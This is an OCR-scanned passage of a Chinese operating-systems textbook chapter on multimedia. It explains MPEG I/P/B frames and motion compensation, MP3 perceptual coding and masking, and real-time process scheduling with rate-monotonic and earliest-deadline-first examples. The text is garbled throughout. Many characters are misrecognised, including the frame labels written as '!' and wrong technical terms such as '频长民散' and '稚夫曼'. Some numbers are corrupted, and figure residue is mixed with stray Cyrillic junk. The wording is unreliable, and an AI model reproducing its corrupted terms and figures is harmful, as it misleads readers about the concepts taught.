余 ， 利 用 这 一 事实 可 以 达到 额外 的 压缩 效果 。 数 字 便携 式 摄像 机 使 用 的 数字 视频 (Digital Video, DV) 
系统 只 使 用 类 JPEG 的 方案 ， 这 是 因为 只 单独 对 每 一 帧 进行 编码 可 以 达到 更 快 的 速度 ， 从 而 使 编码 可 以 
实时 完成 。 这 一 论断 的 因果 关系 可 以 从 图 7-2 看 出 : 尽管 数字 便携 式 摄像 机 与 未 压缩 电视 相 比 具 有 较 低 
的 数据 率 ， 但 是 却 远 不 及 MPEG-2。( 为 了 使 比较 公平 ， 请 注意 DV 便携 式 摄像 机 以 8 位 对 亮度 、 以 2 位 对 
每 一 色 度 进行 采样 ， 使 用 类 JPEG 编 码 仍然 存在 5 倍 的 压缩 率 。) 

对 于 摄像 机 和 背景 绝对 静止 ， 而 有 一 两 个 演员 在 四 周 缓慢 移动 的 场景 而 言 ， 帧 与 帧 之 间 几 乎 所 有 的 
像素 都 是 相同 的 。 此 时 ， 仅仅 将 每 一 帧 减 去 前 一 帧 并 且 在 差 值 图 像 上 运行 JPEG 就 相当 不 错 。 然而 ， 对 
于 扬 动 或 缩放 摄像 机 镜头 的 场景 而 言 ， 这 一 技术 将 变 得 非常 精 楼 。 此 时 需要 某 种 方法 对 这 一 运动 进行 补 
偿 ， 这 正 是 MPEG 要 做 的 事情 ， 实 际 上 ， 这 就 是 MPEG 和 JPEG 之 间 的 主要 差别 。 

MPEG-2 输 出 由 三 种 不 同 的 帧 组 成 ， 观 看 程序 必须 对 它们 进行 处 理 ， 这 三 种 帧 为 : 

了) 1 帧 ， 自 包含 的 JPEG 编 码 静 止 图 像 。 

2) P 帧 :与 上 一 帧 逐 块 的 差 。 

3) B 帧 ， 与 上 一 帧 和 下 一 帧 的 差 。 

! 帧 只 是 用 JPEG 编 码 的 静止 图 像 ， 沿 着 每 一 轴 还 使 用 了 全 分 辩 率 的 亮度 和 半分 辩 率 的 色 度 。 在 输出 
瀛 中 使 帧 周期 性 地 出 现 是 十 分 必要 的 ， 其 原因 有 三 。 首 先 ，MPEG 可 以 用 于 电视 广播 ， 而 观众 收看 是 随 
意 的 。 如 果 所 有 的 帧 都 依赖 于 其 前 驱 直到 第 一 帧 ， 那么 错过 了 第 一 帧 的 人 就 再 也 无 法 对 随后 的 帧 进行 解 
码 ， 这 样 使 观众 在 电影 开始 之 后 就 不 能 再 进行 收看 。 第 二 ， 如 果 任何 一 帧 在 接收 时 出 现 错误 ， 那 么 进 一 
步 的 解码 就 不 可 能 再 进行 。 第 三 ， 没 有 ! 帧 ， 在 进行 快 进 或 倒 带 时 ， 解码 器 将 不 得 不 计算 经 过 的 每 一 帧 ， 
只 有 这 样 才能 知道 快 进 或 倒 带 停止 时 帧 的 全 部 值 。 有 了 ! 帧 ， 就 可 以 向 前 或 向 后 跳 过 若干 帧 直到 找到 一 
个 1 帧 并 从 那里 开始 观看 。 由 于 上 述 原因 ， MPEG 每 秒 将 [ 帧 插入 到 输出 中 一 次 或 两 次 。 

与 此 相对 昭 ，P 帧 是 对 帧 间 差 进行 编码 。P 帧 基于 安 块 (macroblock) 的 思想 ， 宏 块 覆盖 亮度 空间 中 
16 x 16 个 像素 和 色 度 空间 中 8 x 8 个 像素 。 通过 在 前 一 帧 中 搜索 宏 块 或 者 与 其 只 存在 轻微 差异 的 宏 块 实现 
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对 一 个 宏 块 的 编码 。 

P 帧 的 用 途 在 图 7-10 所 示 的 例子 中 可 以 看 出 。 在 图 7-10 中 我 们 看 到 三 个 连续 的 帧 具有 相同 的 背景 ， 
但 是 在 一 个 人 所 在 的 位 置 上 存在 差异 。 对 于 摄像 机 固定 在 三 脚 架 上 ,而 演员 在 摄像 机 面前 活动 的 情形 中 ， 
这 种 场景 是 常见 的 。 包 含 背 景 的 宏 块 是 严格 匹配 的 ， 但 是 包含 人 的 宏 块 在 位 置 上 存在 某 一 未 知 数量 的 偏 
移 ， 编 码 时 必须 追踪 到 前 一 帧 中 相应 的 宏 块 。 


图 7-10 三 个 连续 的 视频 帧 


MPEG 标 准 没有 规定 如 何 搜索 、 搜 索 多 远 以 及 如 何 计算 一 个 匹配 的 好 坏 ， 这 些 都 留 给 每 一 具体 的 实 
现 。 例 如， 一 种 实现 可 能 在 前 一 帧 中 的 当前 位 置 以 及 所 有 在 x 方向 偏 移 土 Ax、 在 y 方 向 偏 移 土 Ay 的 位 置 搜 
索 一 个 宏 块 。 对 于 每 个 位 置 ， 可 以 计算 出 亮度 矩阵 中 匹配 的 数目 。 具 有 最 高 得 分 的 位 置 将 成 为 获胜 者 ， 
只 要 其 得 分 高 于 某 一 预 设 的 阅 值 。 否 则 ， 宏 块 就 被 称 为 失 配 。 当 然 ， 更 复杂 的 算法 也 是 可 能 的 。 

如 果 一 个 宏 块 被 找到 ， 则 通过 以 其 值 与 前 一 帧 中 的 值 求 差 对 其 进行 编码 〈 针 对 亮度 和 两 个 色 度 ) ， 
然后 ， 对 这 些 差 值 矩阵 进行 JPEG 编 码 。 输 出 流 中 宏 块 的 值 是 运动 矢量 ( 宏 块 在 每 一 方向 从 其 前 一 位 置 
移动 多 远 的 距离 )， 随 后 是 以 JPEG 进 行 编码 的 与 前 一 帧 的 差 值 。 如 果 宏 块 在 前 一 帧 中 查找 不 到 ， 则 当前 
值 以 JPEG 进 行 编码 ， 如 同 在 ! 帧 中 一 样 。 

B 帧 与 P 帧 相 类 似 ， 不 同 的 是 它 允 许 参考 宏 块 既 可 以 在 前 一 帧 中 ， 也 可 以 在 后 续 的 帧 中 ， 既 可 以 在 I 
帧 中 ， 也 可 以 在 P 帧 中 。 这 一 额外 的 自由 可 以 改进 运动 补偿 ， 并 且 在 物体 从 前 面 (或 后 面 ) 经 过 其 他 物 
体 时 非常 有 用 。 例 如 ， 在 一 场 垒 球 比赛 中 ， 当 三 垒 手 将 球 振 向 一 垒 时 ， 可 能 存在 某 些 帧 其 中 垒球 遮 项 了 
在 背景 中 移动 的 二 又 手 的 头 部 。 在 下 一 帧 中 ， 二 又 手 的 头 部 可 能 在 垒球 的 左面 有 一 部 分 可 见 ， 头 部 的 下 
一 个 近似 可 以 从 垒球 已 经 通过 了 头 部 的 后 续 的 帧 中 导出 。B 帧 允许 一 个 帧 基于 未 来 的 帧 。 

要 进行 B 帧 编码 ， 编 码 器 需要 在 内 存 中 同时 保存 三 个 解码 的 帧 ; 过 去 的 一 帧 、 当 前 的 一 帧 和 未 来 的 一 帧 。 
为 了 简化 解码 ， 各 帧 必须 以 依赖 的 顺序 而 不 是 以 显示 的 烦 序 出 现在 MPEG 流 中 。 因 而 ， 当 一 段 视频 通过 网 络 
被 观看 时 ， 即 使 有 完美 的 定时 ， 在 用 户 的 机 器 上 也 需要 进行 缓冲 ， 对 帧 进行 记录 以 便 正 常 地 显示 。 由 于 这 一 
依赖 顺序 和 显示 顺序 间 的 差异 ， 试 图 反 向 播放 一 部 电影 而 没有 相当 可 观 的 缓冲 和 复杂 的 算法 是 无 法 工作 的 。 

有 许多 动作 以 及 快速 剪 切 (比如 战争 电影 ) 的 电影 需要 许多 I 型 帧 。 而 那 种 在 导演 对 准 了 摄像 机 之 
后 便 出 去 喝 匣 啡 ， 只 留 下 演员 背 台词 (比如 爱情 故事 ) 的 电影 ， 就 可 以 使 用 长 段 的 P 帧 与 B 帧 ， 而 这 两 种 
帧 结构 与 I 帧 相 比 使 用 很 少 的 存储 空间 。 从 磁盘 效率 的 角度 来 看 ， 一 个 运营 多 媒体 服务 的 公司 应 该 尝试 
得 到 尽 可 能 多 的 女性 消费 群体 。 


74 音频 压缩 

就 像 我 们 刚刚 看 到 的 ，CD 品 质 的 音频 需要 一 个 1.411 Mbps 带 宽 的 传送 。 很 清楚 ， 在 Internet 的 实际 
传送 中 ， 需 要 有 效 的 压缩 。 正 是 因为 这 一 点 ， 已 经 发 展 起 来 许多 不 同 的 音频 压缩 算法 。 或 许 最 流行 的 算 
法 是 拥有 三 个 层 ( 变 体 ) 的 MPEG 音 频 ， 其 中 ，MP3(MPEG 音频 层 3) 是 功能 最 强大 也 是 最 出 名 的 。 在 
Internet 上 随处 可 见 大 量 MP3 格 式 的 音乐 ， 它 们 并 非 都 合法 ， 因 此 引发 了 许多 来 自 艺术 家 与 版 权 拥 有 者 的 
案件 。MP3 属 于 MPEG 视 频 压 缩 标准 里 的 音频 部 分 。 

音频 压缩 可 以 用 两 种 方法 完成 。 在 波形 编码 技术 中 ， 信 号 通过 候 立 叶 变换 (Fourier transform) 变 
换 成 频率 分 量 。 图 7-11 给 出 一 个 时 间 与 它 最 初 的 15 个 传 立 叶 振幅 的 实例 函数 。 然 后 每 一 个 分 量 的 振幅 用 
最 简短 的 方法 编码 。 目 标 是 在 另 一 端 用 尽 可 能 少 的 二 进 制 位 精确 地 重建 其 波形 。 

另 一 种 方法 是 感知 编码 ， 这 种 技术 是 在 人 类 听觉 系统 中 寻找 某 种 细 纹 ， 用 来 对 信号 编码 ， 这 种 信号 
听 起 来 与 人 的 正常 收听 相同 ， 尽 管 在 示波器 上 看 起 来 却 大 相 径 庭 。 感 知 编码 是 基于 心理 声学 的 一 一 人 们 
如 何 感 知 声音 的 科学 。MP3 正 是 基于 感知 编码 。 
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2i 234567 89101112131415 
谐 波 数 
а) 
1 谐 波 
1 
2 谐 波 
1 2 
4 谐 波 
1234 
8 谐 波 
12345678 
谐 波 数 一 一 


е) 
图 7-11 а) 二 进 制 信号 和 它 的 均 方 根 傅立叶 振幅 ，b) ~e) 成 功 允 近 原始 信号 


感知 编码 的 关键 特性 在 于 一 些 声音 可 以 挫 二 住 其 他 声音 。 想 象 在 一 个 温暖 夏天 举办 的 现场 直播 的 长 
笛 音乐 会 ， 突 然 间 ， 附 近 的 一 群 工人 打开 他 们 的 风 钞 开 始 控 据 街道 。 这 时 没有 人 可 以 再 听 到 笛子 的 声音 
因为 它 已 经 被 风 镶 的 声音 给 掩盖 了 。 从 传送 角度 看 ， 只 编码 风 销 的 频段 就 足够 了 ， 因 为 听众 无 论 如 何 都 
昕 不 到 笛子 的 声音 。 这 种 技术 就 叫做 频 长 民 散 一 在 一 个 频段 里 响亮 的 声音 扼 盖 住 另 一 频段 中 较 柔 和 声 
音 的 能 力 ， 这 种 较 柔 和 声音 只 有 在 没有 响亮 声音 时 才 可 以 听 到 。 事 实 上 ， 即 使 风 销 停 止 工作 ， 在 一 个 短 
时 间 内 笛子 的 声音 也 很 难 再 被 听 到 ， 因 为 耳朵 在 开始 工作 时 已 经 调 低 了 增益 ， 并 且 需 要 在 一 段 时 间 之 后 
才 会 再 次 调 高 增益 。 这 种 效果 称 为 暂时 屏蔽 。 

为 了 使 得 这 些 影响 能 尽量 被 量化 ， 设 想 实验 1。 某 个 人 在 一 间 安 静 的 屋子 里 戴 着 与 计算 机 声卡 相连 
的 耳机 。 计 算 机 产生 最 低 100Hz 但 功率 逐渐 增加 的 纯正 弦 波 。 这 个 人 被 命令 在 他 /她 听 到 一 个 音调 的 时 候 
敲 击 一 个 键 。 计 算 机 在 记录 当前 功率 级 之 后 ， 以 200Hz、300hz 以 及 其 他 所 有 不 超过 人 类 听力 极限 的 频率 
重复 之 前 的 实验 。 在 把 许多 实验 者 的 实验 平均 值 计算 出 来 后 ， 一 张 关于 “需要 多 大 功率 才能 使 人们 听 到 


274 #7% 


一 个 音调 ”的 对 数 - 对 数 图 就 展现 出 来 了 ， 如 图 7-12a 所 示 。 图 中 曲线 的 给 出 直接 结果 是 : 人 们 并 没有 必 
要 对 那些 功率 在 可 听 闵 值 之 下 的 频率 编码 。 例 如 ， 在 图 7-12a 中 ， 如 果 100Hz 的 功率 是 20d4B， 那 么 在 输出 
上 就 可 以 忽略 掉 ， 而 且 不 会 感觉 到 声音 质量 的 损失 ， 因 为 在 100Hz 处 204B 是 低 于 可 听 水 平 的 。 


80 С ЫА 
5% "ТИ є 在 150Hz 处 
Ж 40 © 屏蔽 信号 
* 20 R 
о ul asul П 
ГЭР: ЭК ГИК КЕГЕТИ ГИЖЕ ЖЕШКЕ ЕИ 
频率 (kHz) 频率 (kHz) 


а b) 
图 7-12 а) 作为 频率 函数 的 可 听 阔 值 ，b) 屏蔽 效应 


现在 考虑 实验 2。 计 算 机 再 次 运行 实验 !， 但 是 这 次 却 一 有 个 大 约 150 赫 兹 的 等 幅 正 弦 波 又 加 在 实验 
频率 上 。 我 们 发 现 ， 在 150Hz 频 率 附近 的 可 听 阔 值 上 升 了 ， 如 图 7-12b 所 示 。 

这 一 新 实验 的 结果 表明 通过 跟踪 那些 被 附近 频段 能 量 更 强 的 信号 所 屏蔽 的 信号 ， 可 以 省 略 越 来 越 
多 的 编码 信号 中 的 频率 ， 以 此 来 节约 二 进 制 位 。 在 图 7-12 中 ，125Hz 信 号 的 输出 是 可 以 完全 忽略 掉 的 ， 
并 且 没有 人 能 够 听 出 其 中 的 不 同 。 甚 至 当 某 个 频段 中 的 一 个 强大 信号 停止 后 ， 出 于 对 暂时 屏蔽 这 一 知识 
的 了 解 ， 也 会 让 我 们 在 耳朵 恢复 期 的 时 间 段 内 省 略 掉 那 些 被 屏 项 的 频率 。MP3 编 码 的 实质 就 是 对 声音 做 
伟 立 叶 变换 从 而 得 到 每 个 频率 的 能 量 ， 之 后 只 传递 那些 不 被 屏蔽 掉 的 频率 ， 并 且 用 尽 可 能 少 的 二 进 制 位 
数 来 编码 这 些 频率 。 

有 了 这 些 信息 作为 背景 ， 现 在 来 考察 有 关 编码 是 如 何 完成 的 。 通 过 抽取 32kHz、44.1kHz 或 者 48 kHz 的 
波形 ， 完 成 声音 压缩 。 第 一 个 和 最 后 一 个 都 是 四 舍 五 入 的 整数 。44.1kHz 是 用 于 Audio CD 的 ， 因 为 这 个 值 
能 很 好 地 捕获 人 耳 可 听 到 的 所 有 音频 信息 。 可 以 在 以 下 四 个 配置 中 任 选 一 个 ， 用 一 或 两 个 通道 完成 抽样 : 

1) 单 声 道 (一 个 输入 流 )。 

2) 双 声 道 (例如 ， 一 个 英语 的 和 一 个 日 语 的 音 轨 )。 

3) 分 立 立体 声 (每 个 通道 分 开 压缩 )。 

4) 联合 立体 声 (完全 利用 通道 间 的 元 余 )。 

首先 ， 选 择 输出 的 比特 率 。MP3 可 以 将 摇滚 CD 的 立体 声 降 低 到 96kbps， 并 且 在 质量 上 几乎 没有 任 
何 失真 ， 甚 至 连播 滚 迷 都 听 不 出 差别 。 而 对 于 一 场 钢琴 音乐 会 ， 至 少 需要 128kbps。 造 成 这 样 不 同 的 原 
因 是 因为 摇滚 的 信 噪 比 要 比 一 场 钢琴 音乐 会 要 高 得 多 (至少 从 工程 角度 上 看 ) 。 也 可 以 选择 稍 低 一 点 的 
输出 比率 ， 接 受 质量 上 的 少许 失真 。 

然后 将 这 些 样本 处 理 成 1152 (大 概 26ms) 的 一 些 组 ， 每 组 首先 通过 32 个 数字 滤波 器 ， 获 得 32 个 频 
率 波段 。 同 时 ， 将 输入 放 进 一 个 心理 声学 的 模型 中 ， 测 定 被 屏蔽 的 频率 。 接 下 来 ， 进 一 步 转换 32 频 率 波 
段 中 的 每 一 个 ， 以 提供 一 个 更 精确 的 频谱 解决 方案 。 

接着 ， 将 现 有 的 二 进 制 位 分 配 到 各 个 波段 中 ， 大 部 分 二 进 制 位 分 配给 拥有 多 数 频谱 能 量 的 未 屏蔽 波 
段 ， 小 部 分 二 进 制 位 分 配给 拥有 较 少 频谱 能 量 的 未 屏蔽 波段 ， 已 屏蔽 的 波段 不 分 配 二 进 制 位 。 最 后 ， 用 
稚 夫 曼 编码 来 对 这 些 二 进 制 位 进行 编码 ， 它 可 以 将 经 常 出 现 的 数字 赋予 较 短 的 代码 ， 而 对 不 常 出 现 的 数 
字 赋 予 较 长 的 代码 。 

实际 的 工作 过 程 更 复杂 。 为 了 减少 噪音 ， 消 除 混 清 ， 以 及 利用 通道 间 宛 余 ， 需 要 各 种 各 样 的 技术 ， 
不 过 这 些 内 容 超 出 了 本 书 的 范围 。 


7.5 多 媒体 进程 调度 
支持 多 媒体 的 操作 系统 与 传统 的 操作 系统 在 三 个 主要 的 方面 有 所 区 别 ， 进程 调度 、 文 件 系统 和 磁盘 
调度 。 本 节 中 我 们 开始 讨论 进程 调度 ， 在 后 面 的 各 节 中 接着 讨论 其 他 主题 。 
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7.5.1 调度 同 质 进程 

最 简单 的 一 种 视频 服务 器 可 以 支持 显示 固定 数目 的 电影 ， 所 有 电影 使 用 相同 的 帧 率 、 视 频 分 辨 率 、 
数据 率 以 及 其 他 参数 。 在 这 样 的 情况 下 ， 可 以 采用 下 述 简单 但 是 有 效 的 调度 算法 。 对 每 一 部 电影 ， 存 在 一 
个 进程 (或 线程 ) ， 其 工作 是 每 次 从 磁盘 中 读 取 电 影 的 一 帧 然后 将 该 帧 传送 给 用 户 。 由 于 所 有 的 进程 同等 
重要 ， 每 一 帧 有 相同 的 工作 量 要 做 ， 并 且 当 它 们 完成 当前 帧 的 处 理 时 将 阻塞 ， 所 以 采用 轮转 调度 可 以 很 好 
地 做 这 样 的 工作 。 将 调度 算法 标准 化 的 惟一 的 额外 要 求 是 定时 机 制 ， 以 确保 每 一 进程 以 恰当 的 频率 运行 。 

实现 适当 定时 的 一 种 方式 是 有 一 个 主 控 时 钟 ， 该 时 钟 每 秒 滴答 适当 的 次 数 ， 例 如 针对 NTSC 制 式 ， 
每 秒 滴答 30 次 。 在 时 钟 的 每 一 泣 答 ， 所 有 的 进程 以 相同 的 次 序 相继 运行 。 当 一 个 进程 完成 其 工作 时 ， 它 
将 发 出 suspend 系 统 调用 释放 CPU 直到 主 控 时 钟 再 次 滴答 。 当 主 控 时 钟 再 次 滴答 时 ， 所 有 的 进程 再 次 以 
相同 的 次 序 运行 。 只 要 进程 数 足够 少 ， 所 有 的 工作 都 可 以 在 一 帧 的 时 间 内 完成 ， 采 用 轮转 调度 就 足够 了 。 


752 一 般 实 时 调度 
不 幸 的 是 , 这 一 模型 在 实践 中 几乎 没有 什么 用 处 。 随 着 观众 的 来 来 去 去 ， 用 户 的 数目 不 断 发 生变 化 ， 
由 于 视频 压缩 的 本 性 (1 帧 比 P 帧 或 B 帧 大 得 多 )， 帧 的 大 小 剧烈 变化 ， 并 且 不 同 的 电影 可 能 有 不 同 的 分 辨 
率 。 因 此 ， 不 同 的 进程 可 能 必须 以 不 同 的 频率 运行 ， 具 有 不 同 的 工作 量 ， 并 且 具 有 不 同 的 最 终 时 限 (在 
此 之 前 所 有 工作 必须 完成 ) 。 
这 些 考虑 导致 一 个 不 同 的 模型 : 多 个 进程 竞争 CPU， 每 个 进程 有 自己 的 工作 量 和 最 终 时 限 。 在 下 面 
的 模型 中 ， 我 们 将 假设 系统 知道 每 个 进程 必须 以 什么 样 的 频率 运行 、 有 多 少 工作 要 做 以 及 下 一 个 最 终 时 
限 是 什么 。( 磁 盘 调度 也 是 一 个 问题 ， 但 我 们 将 在 后 面 考虑 。) 多 个 相互 竞争 的 进程 ， 其 中 若干 进程 或 全 
部 进程 具有 必须 满足 的 最 终 时 限 的 调度 称 为 实时 调度 (real-time scheduling), 
作为 实时 多 媒体 调度 程序 工作 环境 的 一 个 例子 ， 我 们 考虑 三 个 进程 A、B 和 C， 如 图 7-13 所 示 。 进 程 
A 每 30ms 运 行 一 次 (近似 NTSC 制 式 速度 )， 每 一 帧 需要 10ms 的 CPU 时 间 。 在 不 存在 竞争 的 情况 下 ， 进 程 
A 将 在 突 发 A1、A2、A3 等 中 运行 ， 每 一 突 发 在 前 一 突 发 的 30ms 之 后 开始 。 每 个 CPU 突 发 处 理 一 帧 并 且 
具有 一 个 最 终 时 限 ， 它 必须 在 下 一 个 突 发 开始 之 前 完成 。 
Al, ВІ, СТ АЖ 
的 开始 时 刻 时 限 


B1 的 最 终 时 限 
/ CI1 的 最 终 时 限 
ГА 
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时 间 (ms) 一 > 
图 7-13 三 个 周期 性 的 进程 ， 每 个 进程 播放 一 部 电影 ， 每 一 电影 的 帧 率 以 及 每 帧 的 处 理 需求 有 所 不 同 


图 7-13 中 还 有 另外 两 个 进程 ， B 和 C。 进 程 B 每 秒 运行 25 次 (例如 PAL 制 式 ) ， 进 程 C 每 秒 运行 20 次 
(例如 一 个 慢 下 来 的 NTSC 或 PAL 流 ， 意 在 使 一 个 低 带宽 的 用 户 连 接 到 视频 服务 器 ) 。 每 一 帧 的 计算 时 间 
如 图 7-13 中 所 示 ， 进 程 B 为 15ms， 进 程 C 为 5ms， 没 有 使 它们 都 具有 相同 的 时 间 只 是 为 了 使 调度 问题 更 加 
一 般 化 。 

现在 调度 问题 是 如 何 调度 A、B 和 C 以 确保 它们 满足 各 自 的 最 终 时 限 。 在 寻找 调度 算法 之 前 ， 我 们 必 
须 看 一 看 这 一 组 进程 究竟 是 不 是 可 调度 的 。 回 想 2.4.4 节 ， 如 果 进 程 具 有 P ms 的 周期 并 且 需 要 Cims 的 
CPU 时 间 ， 那 么 系统 是 可 调度 的 当 且 仅 当 
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其 中 m 是 进程 数 ， 在 本 例 中 ，m = 3。 注 意 ，Ci/ Pi 只 是 CPU 被 进程 :使 用 的 部 分 。 就 图 7-13 所 示 的 例子 而 
言 ， 进 程 A 用 掉 CPU 的 10/30， 进 程 B 用 掉 CPU 的 15/40， 进 程 C 用 掉 CPU 的 5/50。 将 这 些 分 数 加 在 一 起 为 
CPU 的 0.808， 所 以 该 系统 是 可 调度 的 。 

到 目前 为 止 我 们 假设 每 个 影片 流 有 一 个 进程 ， 实 际 上 ， 每 个 影片 流 可 能 有 两 个 (或 更 多 个 ) 进程 ， 
例如 ， 一 个 用 于 音频 ， 一 个 用 于 视频 。 它 们 可 能 以 不 同 的 速率 运行 并 且 每 一 脉冲 可 能 消耗 不 同 数量 的 
CPU 时 间 。 然 而 ， 将 音频 进程 加 入 到 系统 中 并 没有 改变 一 般 模型 ， 因 为 我 们 的 全 部 假设 是 存在 m 个 进程 ， 
每 个 进程 以 一 个 固定 的 频率 运行 ， 对 每 一 CPU 突 发 有 固定 的 工作 量 要 求 。 

在 某 些 实时 系统 中 ， 进 程 是 可 抢占 的 ， 在 其 他 的 系统 中 ， 进 程 是 不 可 抢占 的 。 在 多 媒体 系统 中 ， 进 
程 通常 是 可 抢占 的 ， 这 意味 着 允许 有 危险 错过 其 最 终 时限 的 进程 在 正在 运行 的 进程 完成 工作 以 前 将 其 中 
断 ， 然 后 当 它 完成 工作 之 后 ， 被 中 断 的 前 一 个 进程 再 继续 运行 。 这 一 行为 只 不 过 是 多 道 程序 设计 ， 正 如 
我 们 在 前 面 已 经 看 过 的 。 我 们 要 研究 的 是 可 抢占 的 实时 调度 算法 ， 因 为 在 多 媒体 系统 中 没有 拒绝 它们 的 
理由 并 且 它们 比 不 可 抢占 的 调度 算法 具有 更 好 的 性 能 。 惟 一 要 关心 的 是 如 果 传 输 缓冲 区 在 很 少 的 几 个 突 
发 中 被 填充 ， 那 么 在 最 终 时 限 到 来 之 前 该 缓冲 区 应 该 是 完全 满 的 ， 这 样 它 就 可 以 在 一 次 操作 中 传递 给 用 
Р, ЖА). 

实时 算法 可 以 是 静态 的 也 可 以 是 动态 的 。 静 态 算法 预先 分 配给 每 个 进程 一 个 固定 的 优先 级 ， 然 后 使 用 
这 些 优先 级 做 基于 优先 级 的 抢占 调度 。 动 态 算法 没有 固定 的 优先 级 。 下 面 我 们 将 研究 每 种 类 型 的 一 个 例子 。 


7.5.3 速率 单调 调度 

适用 于 可 抢占 的 周期 性 进程 的 经 典 静态 实时 调度 算法 是 违 率 单调 调度 (Rate Monotonic Scheduling, 
RMS) (Liu 和 Layland, 1973)。 它 可 以 用 于 满足 下 列 条 件 的 进程 ， 

1) 每 个 周期 性 进程 必须 在 其 周期 内 完成 。 

2) 没有 进程 依赖 于 任何 其 他 进程 。 

3) 每 一 进程 在 一 次 突 发 中 需要 相同 的 CPU 时 间 量 。 

4) 任何 非 周 期 性 进程 都 没有 最 终 时 限 。 

5) 进程 抢占 即刻 发 生 而 没有 系统 开销 。 

前 四 个 条 件 是 合理 的 。 当 然 ， 最 后 一 个 不 是 ， 但 是 该 条 件 使 系统 建 模 更 加 容易 。RMS 分 配给 每 个 进 
程 一 个 固定 的 优先 级 ， 优 先 级 等 于 进程 触发 事件 发 生 的 频率 。 例 如 ， 必 须 每 30ms 运 行 一 次 (每 秒 33 次 ) 
的 进程 获得 的 优先 级 为 33， 必 须 每 40ms 运 行 一 次 (每 秒 25 次 ) 的 进程 获得 的 优先 级 为 25， 必 须 每 50ms 
运行 一 次 (每 秒 20 次 ) 的 进程 获得 的 优先 级 为 20。 所 以 ， 优 先 级 与 进程 的 速率 (每 秒 运行 进程 的 次 数 ) 
成 线性 关系 ， 这 正 是 为 什么 将 其 称 为 速率 单调 的 原因 。 在 运行 时 ， 调 度 程序 总 是 运行 优先 级 最 高 的 就 绪 
进程 ， 如 果 需 要 则 抢占 正在 运行 的 进程 。Liu 和 Layland 证 明了 在 静态 调度 算法 种 类 中 RMS 是 最 优 的 。 

图 7-14 演 示 了 在 图 7-13 所 示 的 例子 中 速率 单调 调度 是 如 何 工作 的 。 进 程 A、B 和 C 分 别 具 有 静态 优先 
级 33、25 和 20， 这 意味 着 只 要 A 需要 运行 ， 它 就 可 以 运行 ， 抢 占 任何 当前 正在 使 用 CPU 的 其 他 进程 。 进 
程 B 可 以 抢占 C， 但 不 能 抢占 A。 进 程 C 必 须 等 待 直到 CPU 空闲 才能 运行 。 
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图 7-14 RMS 和 EDF 实 时 调度 的 一 个 例子 
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在 图 7-14 中 ， 最 初 所 有 三 个 进程 都 就 绪 要 运行 ， 优 先 级 最 高 的 进程 A 被 选中 ， 并 准许 它 运行 直到 它 
在 10ms 时 完成 ， 如 图 7-14 中 的 RMS 一 行 所 示 。 在 进程 A 完成 之 后 ， 进 程 B 和 C 以 先后 次 序 运行 。 合 起 来 ， 
р 程 花费 了 30ms 的 时 间 运 行 ， 所 以 当 C 完 成 的 时 候 ， 正 是 该 A 再 次 运行 的 时 候 。 这 一 轮换 持续 进行 
直到 1 = 70 时 系统 变 为 空间 。 

在 ! = 80 时 ， 进 程 B 就 绪 并 开始 运行 。 然 而 ， 在 ! = 90 时 ， 优先 级 更 高 的 进程 A 变 为 就 绪 ， 所 以 它 抢 
占 B 并 运行 ， 直 到 在 + = 100 时 完成 。 在 这 一 时 刻 ， 系统 可 以 在 结束 进程 B 或 者 开始 进程 C 之 间 进行 选择 ， 
所 以 它 选择 优先 级 最 高 的 进程 B。 
7.54 最 早 最 终 时 限 优先 调度 

另 一 个 流行 的 实时 调度 算法 是 最 早 最 终 时 限 优先 (Earliest Deadline First, EDF) 算法 。 EDF 是 一 
个 动态 算法 ， 它 不 像 速率 单调 算法 那样 要 求 进程 是 周期 性 的 。 它 也 不 像 RMS 那 样 要 求 每 个 CPU 突 发 有 相 
同 的 运行 时 间 。 只 要 一 个 进程 需要 CPU 时 间 ， 它 就 宣布 它 的 到 来 和 最 终 时 限 。 调度 程序 维持 一 个 可 运行 
进程 的 列表 ， 该 列表 按 最 终 时 限 排序 。EDF 算 法 运行 列表 中 的 第 一 个 进程 ， 也 就 是 具有 最 近 最 终 时 限 的 
进程 。 当 一 个 新 的 进程 就 绪 时 ， 系统 进行 检查 以 了 解 其 最 终 时 限 是 否 发 生 在 当前 运行 的 进程 结束 之 前 。 
如 果 是 这 样 ， 新 的 进程 就 抢占 当前 正在 运行 的 进程 。 

图 7-14 给 出 了 EDF 的 一 个 例子 。 最 初 所 有 三 个 进程 都 是 就 绪 的 ， 它们 按 其 最 终 时 限 的 次 序 运行 。 进 
程 A 必 须 在 ! = 30 之 前 结束 ，B 必 须 在 = 40 之 前 结束 ， C 必 须 在 + = 50 之 前 结束 ， 所 以 A 具 有 最 早 的 最 终 时 
限 并 因此 而 先 运行 。 直 到 + = 90， 选 择 都 与 RMS 相 同 。 在 + = 90 时 ， A 再 次 就 结 ， 并 且 其 最 终 时 限 为 ! = 
120， 与 B 的 最 终 时 限 相 同 。 调 度 程序 可 以 合理 地 选择 其 中 任何 一 个 运行 ， 但 是 由 于 抢占 B 具 有 某 些 非 零 
的 代价 与 之 相 联系 ， 所 以 最 好 是 让 B 继 续 运行 ， 而 不 去 承担 切换 的 代价 。 

为 了 消除 RMS 和 EDF 总 是 给 出 相同 结果 的 想法 ， 现在 让 我 们 看 一 看 另外 一 个 例子 ， 如 图 7-15 所 示 。 
在 这 个 例子 中 ， 进 程 A、B 和 C 的 周期 与 前 面 的 例子 相同 ， 但 是 现在 A 每 次 突 发 需要 15ms 的 CPU 时 间 ， 而 
不 是 只 有 10ms。 可 调度 性 测试 计算 CPU 的 利用 率 为 0.500 + 0.375 + 0.100 = 0.975。CPU 只 留 下 了 2.5%， 
但 是 在 理论 上 CPU 并 没有 被 超额 预定 ， 找到 一 个 合理 的 调度 应 该 是 可 能 的 。 
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图 7-15 以 RMS 和 EDF 进 行 实时 调度 的 另 一 个 例子 


对 于 RMS， 三 个 进程 的 优先 级 仍 为 3、25 和 20， 因 为 优先 级 只 与 周期 有 关系 ， 而 与 运行 时 间 没有 
关系 。 这 一 次 ， 进 程 B 直 到 + = 30 才 结束 ， 在 这 一 时 刻 ， 进程 A 再 次 就 绪 要 运行 。 等 到 A 结 束 时 ，! = 45, 
此 时 B 再 次 就 绪 ， 由 于 它 的 优先 级 高 于 C， 所 以 B 运 行 而 C 则 错过 了 其 最 终 时 限 。RMS 失 败 。 

现在 看 一 看 EDF 如 何 处 理 这 种 情况 。 当 ! = 30 时 ， 在 A2 和 C1 之 间 存 在 竞争 。 因为 C1 的 最 终 时 限 是 50， 
而 A2 的 最 终 时 限 是 60， 所 以 C 被 调度 。 这 就 不 同 于 RMS， 在 RMS 中 A 由 于 较 高 的 优先 级 而 成 为 赢家 。 

